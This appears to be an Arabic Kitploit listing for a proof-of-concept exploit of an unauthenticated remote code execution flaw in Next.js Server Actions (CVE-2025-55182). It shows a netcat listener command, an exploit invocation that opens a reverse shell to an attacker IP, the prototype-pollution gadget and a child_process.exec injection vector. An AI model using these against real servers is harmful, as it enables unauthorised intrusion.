Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/uwugreed/cve-2025-55182-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubuwugreed/cve-2025-55182-poc

CVE-2025-55182-poc

أعلم أنك على الأرجح هنا من Hack the Box، وإذا كان الأمر كذلك، فنعم هذا الأداة تعمل فعلاً.

عرض المستودع
9منذ 20 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-55182-poc

إثبات مفهوم (PoC) لاستغلال CVE-2025-55182، يستهدف ثغرة تنفيذ الأكواد عن بُعد (RCE) غير المصادق عليها في Next.js Server Actions.

يستغل هذا السكربت تلوّث النموذج الأولي (prototype pollution) أثناء إلغاء تسلسل حمولات React Server Components (RSC) متعددة الأجزاء (multipart) لحقن أوامر ضارة في عملية Node.js باستخدام تدفق تنفيذ غير متزامن وغير حاجب.


الميزات

  • تنفيذ غير متزامن: يستخدم child_process.exec() بدلاً من واجهات execSync() الحاجبة لمنع تعليق الخيوط على عقد الحاويات.
  • توصيل متعدد الصدفات بشكل قوي: يعتمد على سلسلة صدفة عكسية عبر أنبوب FIFO متوافق مع POSIX لتحقيق أقصى استقرار في التنفيذ عبر محركات حاويات Linux البسيطة.
  • بدون تبعيات خارجية: مبني بالكامل باستخدام مكتبة requests الأصلية في Python.

الاستخدام

1. إعداد المستمع الخاص بك

افتح طرفية على جهازك المهاجم وشغّل مستمع مقبس netcat لالتقاط الاتصال العكسي الوارد:

root@kitploit:~
nc -lvnp 4444

2. تنفيذ السكربت

قم بتوفير عنوان URL الأساسي للهدف، وعنوان IP لواجهة جهازك المحلي، ومنفذ المستمع المطلوب:

root@kitploit:~
python3 exploit.py <target_url> <your_ip> [your_port]

مثال:

root@kitploit:~
python3 exploit.py http://website.whatever:port x.x.x.x 4444

التفاصيل التقنية

يرسل السكربت حمولة multipart خام مصمّمة بعناية مباشرة إلى نقطة نهاية التوجيه الخاصة بالتطبيق مع ترويسة التوجيه Next-Action المطلوبة.

من خلال استغلال توقيعات إنشاء الكائنات عبر {"get":"$1:constructor:constructor"}، يلوّث محرك إلغاء التسلسل شجرة الكائنات الأصلية. وعند معالجة المعاملات المصاحبة، يفسّر كتلة سياق _response المضمنة بشكل خبيث كقائمة تعليمات، مما يسمح بتنفيذ الأكواد بصلاحيات سياق مستخدم خادم Node الجاري.

root@kitploit:~
// الهدف الأساسي للناقل:
process.mainModule.require('child_process').exec('your_payload_here');

⚠️ إخلاء مسؤولية

تم إنشاء هذا السكربت strictly للأغراض التعليمية، والاختبارات الأمنية المصرح بها، والتقاط الأعلام الثغرات في مختبرات مثل Hack The Box. المؤلف غير مسؤول عن أي إساءة استخدام، أو اختراق غير مصرح به للأنظمة، أو الأضرار الناجمة عن هذه الأداة.

تنزيل الأداة